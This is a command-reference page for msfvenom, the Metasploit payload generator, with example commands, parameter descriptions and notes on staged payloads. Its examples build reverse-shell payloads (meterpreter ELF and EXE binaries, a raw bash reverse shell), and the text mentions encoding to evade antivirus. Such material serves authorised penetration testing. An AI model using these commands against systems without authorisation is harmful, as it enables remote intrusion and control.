LinuxCommandLibrary

msfvenom

Generate Metasploit payloads

TLDR

List payloads

$ msfvenom [[-l|--list]] payloads
copy

List formats
$ msfvenom [[-l|--list]] formats
copy

Show payload options
$ msfvenom [[-p|--payload]] [payload] --list-options
copy

Create an ELF binary with a reverse TCP handler
$ msfvenom [[-p|--payload]] linux/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] elf [[-o|--out]] [path/to/binary]
copy

Create an EXE binary with a reverse TCP handler
$ msfvenom [[-p|--payload]] windows/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] exe [[-o|--out]] [path/to/binary.exe]
copy

Create a raw Bash with a reverse TCP handler
$ msfvenom [[-p|--payload]] cmd/unix/reverse_bash LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] raw
copy

SYNOPSIS

msfvenom [options]

PARAMETERS

-p, --payload
    Selects the payload to generate.

-l, --list [module_type]
    Lists available modules of a specific type (payloads, encoders, etc.). If no type is given, lists all module types.

-n, --nopsled
    Prepends a NOP sled of specified length to the payload.

-f, --format
    Specifies the output format (e.g., raw, exe, elf, dll, etc.).

-e, --encoder
    Specifies the encoder to use for obfuscation.

-a, --arch
    Specifies the target architecture.

-o, --out
    Saves the generated payload to the specified file path.

-s, --space
    The maximum size of the resulting payload.

-b, --bad-chars
    Specifies bad characters to avoid in the payload.

-i, --iterations
    Number of encoding iterations.

--platform
    Payload platform

-v, --var-name
    Specifies a custom variable name for the generated payload.

-x, --template
    Specifies a custom executable template to use.

-k, --keep
    Preserves the template functionality when using -x.

-h, --help
    Displays help information.

DESCRIPTION

msfvenom is a command-line instance of Metasploit used to generate payloads. It is a combination of msfpayload and msfencode from earlier versions of Metasploit. It allows for creation of custom payloads (shellcode) for various operating systems and architectures, and offers encoding and obfuscation techniques to evade antivirus detection.
It's a versatile tool for penetration testers and security researchers to build payloads, bind payloads to legitimate applications, create executables, and more. It simplifies the process of payload creation by providing a single interface for generating, encoding, and outputting payloads in various formats. msfvenom supports numerous platforms, architectures, and payload types, making it a critical tool for creating custom payloads for exploitation.

CAVEATS

Payloads generated with msfvenom can be detected by antivirus software. Effective evasion requires careful selection of encoders, bad characters, and obfuscation techniques. Using pre-made payloads without understanding their function can be risky. Some options may not be compatible with all payloads or formats.

UNDERSTANDING PAYLOAD STAGES

Many payloads utilize a 'staged' approach. The initial payload is small and downloads a larger, more complex payload (the 'stage'). This allows for smaller initial payloads that can bypass certain restrictions and then load more advanced functionality. msfvenom allows to create the stager and the stage.

CUSTOMIZING PAYLOADS

msfvenom provides numerous options to customize payloads, including setting LHOST (listening host), LPORT (listening port), and other payload-specific options. Understanding these options is crucial for creating effective payloads for specific target environments. Use -o to write results into a file with specified name.

HISTORY

msfvenom was introduced as a replacement for the separate msfpayload and msfencode tools in Metasploit. This change was made to streamline the payload generation process and improve the user experience.
Its development focused on consolidating payload generation and encoding functionality into a single, unified tool. msfvenom aimed to simplify payload creation and manipulation, making it easier for security professionals to generate and customize payloads for various penetration testing and security research tasks. Over time, it has been expanded with new features, payloads, encoders, and output formats.

SEE ALSO

Copied to clipboard